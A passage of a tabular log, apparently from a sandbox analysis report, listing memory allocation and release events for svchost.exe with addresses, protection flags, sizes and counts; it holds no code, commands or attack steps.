| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
13 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
12 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 27 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 29 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 23 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 38 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
12 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 7 |
|
8 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 33 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 3538944, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 388 |
|
1 | |
| Allocate | svchost.exe | address = 4653056, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 4653056, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 747 |
|
1 | |
| Allocate | svchost.exe | address = 5308416, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 5373952, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 5439488, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 5505024, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 32768 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 9216 |
|
1 | |
| Allocate | svchost.exe | address = 268451840, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 7168 |
|
1 | |
| Allocate | svchost.exe | address = 268460032, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1036 |
|
1 | |
| Allocate | svchost.exe | address = 268464128, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
3 | |
| Allocate | svchost.exe | address = 458752, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
12 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
6 | |
| Allocate | svchost.exe | address = 458752, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
50 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
1 | |
| Allocate | svchost.exe | address = 458752, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 2424832, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 747 |
|
1 | |
| Allocate | svchost.exe | address = 2490368, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 4718592, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 4784128, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 4849664, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 32768 |
|
1 | |
| Allocate | svchost.exe | address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 11264 |
|
1 | |
| Allocate | svchost.exe | address = 268451840, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 4608 |
|
1 | |
| Allocate | svchost.exe | address = 268460032, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1036 |
|
1 | |
| Allocate | svchost.exe | address = 268464128, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
3 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
7 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
5 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
36 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 1245184, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 388 |
|
1 | |
| Allocate | svchost.exe | address = 1310720, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40 |
|
1 | |
| Allocate | svchost.exe | address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 1310720, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 747 |
|
1 | |
| Allocate | svchost.exe | address = 1376256, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 1703936, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 1769472, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 1835008, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 655360, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 1825832960, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 36864 |
|
1 | |
| Allocate | svchost.exe | address = 1825832960, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 1825837056, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 5632 |
|
1 | |
| Allocate | svchost.exe | address = 1825845248, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 1825849344, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 1825853440, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 36 |
|
1 | |
| Allocate | svchost.exe | address = 1825857536, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 1825861632, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1536 |
|
1 | |
| Allocate | svchost.exe | address = 1825865728, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
3 | |
| Allocate | svchost.exe | address = 720896, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
4 | |
| Allocate | svchost.exe | address = 720896, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
37 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 23 |
|
2 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
1 | |
| Allocate | svchost.exe | address = 720896, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 4 |
|
2 | |
| Allocate | svchost.exe | address = 3407872, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
2 | |
| Allocate | svchost.exe | address = 3473408, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 388 |
|
1 | |
| Allocate | svchost.exe | address = 3538944, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 40 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 3473408, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 3538944, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 3604480, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
1 | |
| Allocate | svchost.exe | address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367 |
|
1 | |
| Allocate | svchost.exe | address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112 |
|
1 | |
| Allocate | svchost.exe | address = 1825832960, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 77824 |
|
1 | |
| Allocate | svchost.exe | address = 1825832960, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 1825837056, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 35840 |
|
1 | |
| Allocate | svchost.exe | address = 1825873920, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 6656 |
|
1 | |
| Allocate | svchost.exe | address = 1825882112, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 3072 |
|
1 | |
| Allocate | svchost.exe | address = 1825886208, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 4084 |
|
1 | |
| Allocate | svchost.exe | address = 1825890304, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 1825894400, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 3072 |
|
1 | |
| Allocate | svchost.exe | address = 1825898496, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 1825902592, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 512 |
|
1 | |
| Allocate | svchost.exe | address = 1825906688, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1536 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26 |
|
5 | |
| Allocate | svchost.exe | address = 1179648, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14 |
|
4 | |
| Allocate | svchost.exe | address = 1179648, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
55 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 13 |
|
9 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 22 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 21 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15 |
|
4 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9 |
|
3 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 6 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 11 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 7 |
|
13 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
5 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
6 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16 |
|
1 | |
| Allocate | svchost.exe | address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 5 |
|
2 | |
| Allocate | svchost.exe | address = 6029312, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 132460 |
|
1 | |
| Allocate | svchost.exe | address = 2097152, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 2293760, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Allocate | svchost.exe | address = 6225920, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 44 |
|
2 | |
| Allocate | svchost.exe | address = 6029312, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 85256 |
|
1 | |
| Allocate | svchost.exe | address = 2097152, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 1024 |
|
1 | |
| Allocate | svchost.exe | address = 2293760, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 128 |
|
1 | |
| Allocate | svchost.exe | address = 6160384, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 8 |
|
1 | |
| Free | svchost.exe | address = 917504, free_type = MEM_RELEASE, size = 0 |
|
53 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
59 | |
| Free | svchost.exe | address = 1376256, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1310720, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 458752, free_type = MEM_RELEASE, size = 0 |
|
53 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
58 | |
| Free | svchost.exe | address = 3473408, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1048576, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 3538944, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 3604480, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 3473408, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 1048576, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 917504, free_type = MEM_RELEASE, size = 0 |
|
203 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
218 | |
| Free | svchost.exe | address = 2162688, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 6160384, free_type = MEM_RELEASE, size = 0 |
|
4 | |
| Free | svchost.exe | address = 6094848, free_type = MEM_RELEASE, size = 0 |
|
3 | |
| Free | svchost.exe | address = 6029312, free_type = MEM_RELEASE, size = 0 |
|
5 | |
| Free | svchost.exe | address = 2293760, free_type = MEM_RELEASE, size = 0 |
|
5 | |
| Free | svchost.exe | address = 2097152, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 917504, free_type = MEM_RELEASE, size = 0 |
|
127 | |
| Free | svchost.exe | address = 131072, free_type = MEM_RELEASE, size = 0 |
|
126 | |
| Free | svchost.exe | address = 4653056, free_type = MEM_RELEASE, size = 0 |
|
2 | |
| Free | svchost.exe | address = 5505024, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 5439488, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 5373952, free_type = MEM_RELEASE, size = 0 |
|
1 | |
| Free | svchost.exe | address = 3538944, free_type = MEM_RELEASE, size = 0 |
|
1 | |
